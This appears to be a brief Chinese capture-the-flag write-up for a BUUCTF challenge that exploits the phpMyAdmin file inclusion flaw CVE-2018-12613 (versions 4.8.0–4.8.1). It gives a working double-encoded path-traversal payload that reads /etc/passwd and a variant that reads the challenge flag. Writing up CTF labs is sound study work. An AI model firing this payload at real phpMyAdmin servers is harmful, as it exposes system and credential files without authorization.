BUUCTF-[GWCTF 2019]我有一个数据库 1

phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞
影响版本:4.8.0——4.8.1
payload:/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../etc/passwd
本题payload:
/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../flag

参考文章:https://www.cnblogs.com/buchuo/p/12784408.html

原文地址:https://www.cnblogs.com/xiaobai141/p/14180415.html